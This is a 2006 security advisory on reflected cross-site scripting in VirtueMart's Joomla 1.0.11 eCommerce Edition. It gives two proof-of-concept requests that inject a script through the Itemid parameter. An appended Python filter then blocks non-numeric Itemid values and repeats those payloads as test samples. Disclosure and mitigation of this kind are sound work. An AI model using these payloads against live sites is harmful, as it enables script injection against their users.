VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities
Sep 27 2006 08:11AM
Base64 (base640 gmail com)
VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

Status: Reported to the Vendor [09/26/2006]
Class: Input Validation Error
Severity: Low

Software Description:
*****************************************************************************
VirtueMart (formerly known as mambo-phpShop) is an Open Source
E-Commerce solution to be used together with a Content Management
System (CMS) called Joomla!

Vulnerability Description:
*****************************************************************************
Multiple cross-site scripting vulnerabilities exist in the Joomla
eCommerce edition software provided by VirtueMart.

Vulnerable Software:
*****************************************************************************
Joomla 1.0.11 eCommerce Edition (prior versions may also be vulnerable)

Exploit:
*****************************************************************************
GET: index.php
option=com_contact&Itemid="><script>alert('XSS');</script>
POST: index.php
subscriber_name=1&email=1&task=subscribe&Itemid="><script>alert('XSS');</script>

Solution:
*****************************************************************************

None at this time.

Credits:
*****************************************************************************
Discovered by Adrian Castro
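
With no vendor fix listed, one interim measure is to screen the Itemid parameter before a request reaches the application. The following is an added example, not part of the original advisory and not Joomla or VirtueMart code; it assumes Itemid is always a numeric menu-item id, and the function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumption (not stated in the advisory): Itemid is a numeric menu-item id,
# so an allow-list of digits is enough. An empty value is treated as absent.
NUMERIC_ID = re.compile(r"[0-9]{0,10}")


def bad_itemid_values(encoded_params):
    """Return the decoded Itemid values that are not plain integers.

    parse_qsl percent-decodes each value and returns every occurrence of a
    repeated key, so encoded payloads and duplicate Itemid fields are covered.
    """
    pairs = parse_qsl(encoded_params, keep_blank_values=True)
    return [value for key, value in pairs
            if key == "Itemid" and not NUMERIC_ID.fullmatch(value)]


def screen_request(method, target, body=""):
    """Return (allowed, offending_values) for one request.

    The query string is checked for every method; the form body is checked
    as well for POST, matching the two request shapes in the advisory.
    """
    offending = bad_itemid_values(target.partition("?")[2])
    if method.upper() == "POST":
        offending += bad_itemid_values(body)
    return (not offending, offending)


# Constructed sample requests: the advisory's two requests, a percent-encoded
# variant of the first, and a benign request.
PAYLOAD = "\"><script>alert('XSS');</script>"
SAMPLES = [
    ("GET", "index.php?option=com_contact&Itemid=" + PAYLOAD, ""),
    ("POST", "index.php",
     "subscriber_name=1&email=1&task=subscribe&Itemid=" + PAYLOAD),
    ("GET", "index.php?option=com_contact&Itemid=%22%3E%3Cscript%3E", ""),
    ("GET", "index.php?option=com_contact&Itemid=3", ""),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        allowed, offending = screen_request(method, target, body)
        print("ALLOW" if allowed else "BLOCK", method, target, offending)
```

This screens only the one parameter named in the advisory; the underlying fix is for the application to cast Itemid to an integer on input and HTML-encode it on output.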
